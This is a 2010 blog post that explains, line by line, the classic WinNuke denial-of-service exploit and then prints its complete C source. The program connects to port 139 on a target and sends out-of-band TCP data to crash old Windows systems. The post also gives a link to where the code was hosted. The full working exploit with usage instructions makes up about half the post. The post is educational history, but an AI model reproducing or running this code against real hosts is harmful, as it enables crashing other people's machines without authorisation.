Irregular Expressions

Jun 30 2010   12:05AM GMT

winnuke.c

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Ok here is the code that was at the like I posted previously ( it is posted at the bottom of this).

I am pretty sure this is the right code, line 1 has the author _eci. Wikipedia as an article on it and it lists the name person as the poster of the code.

I am still not an expert in c but I can read the code and point things of interest as we go and see if I can explain them a bit.

Lines 5-11 are includes that are pulling in the needed code that is needed. Some of the ones of note would be 8 and 10, netinet and socket.

13 is setting up the destination port, 139 in this case.

15 – 18 is the declaration of variables and structures.

21 is the start of sub called open_sock that is going to be making the connection out. ( If you are really interested in creating sockets there is great examples to be found on google.)

On line 59 you can see the call to the sub with some variables. open_sock(<the name of the socket>, <the target>, <the destination port>)

Line 62 is the attack, send(<the name of the socket>, <the message to send>, <the length of the message>, <additional flags>). The payload is “Bye”, but the message is irrelevant. The important part is the additional flags, MSG_OOB. MSG_OOB is the signal in the TCP header that this is out of band, and that is exactly what causes the system to blue screen.

Ta Da!

( it was here if you did not get it –> neil.franklin.ch/Info_Texts/winnuke.c )

1 /* winnuke.c - (05/07/97)  By _eci  */
2 /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
3
4
5 #include <stdio.h>
6 #include <string.h>
7 #include <netdb.h>
8 #include <netinet/in.h>
9 #include <sys/types.h>
10 #include <sys/socket.h>
11 #include <unistd.h>
12
13 #define dport 139  /* Attack port: 139 is what we want */
14
15 int x, s;
16 char *str = "Bye";  /* Makes no diff */
17 struct sockaddr_in addr, spoofedaddr;
18 struct hostent *host;
19
20
21 int open_sock(int sock, char *server, int port) {
22     struct sockaddr_in blah;
23     struct hostent *he;
24     bzero((char *)&blah,sizeof(blah));
25     blah.sin_family=AF_INET;
26     blah.sin_addr.s_addr=inet_addr(server);
27     blah.sin_port=htons(port);
28
29    if ((he = gethostbyname(server)) != NULL) {
30       bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
31    }
32    else {
33         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
34           perror("gethostbyname()");
35           return(-3);
36         }
37    }
38
39        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
40             perror("connect()");
41             close(sock);
42             return(-4);
43        }
44        printf("Connected to [%s:%d].\n",server,port);
45        return;
46 }

47 void main(int argc, char *argv[]) {
48
49     if (argc != 2) {
50       printf("Usage: %s <target>\n",argv[0]);
51       exit(0);
52     }
53
54     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
55        perror("socket()");
56        exit(-1);
57     }
58
59     open_sock(s,argv[1],dport);
60
61     printf("Sending crash... ");
62       send(s,str,strlen(str),MSG_OOB);
63       usleep(100000);
64     printf("Done!\n");
65     close(s);
66 }

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: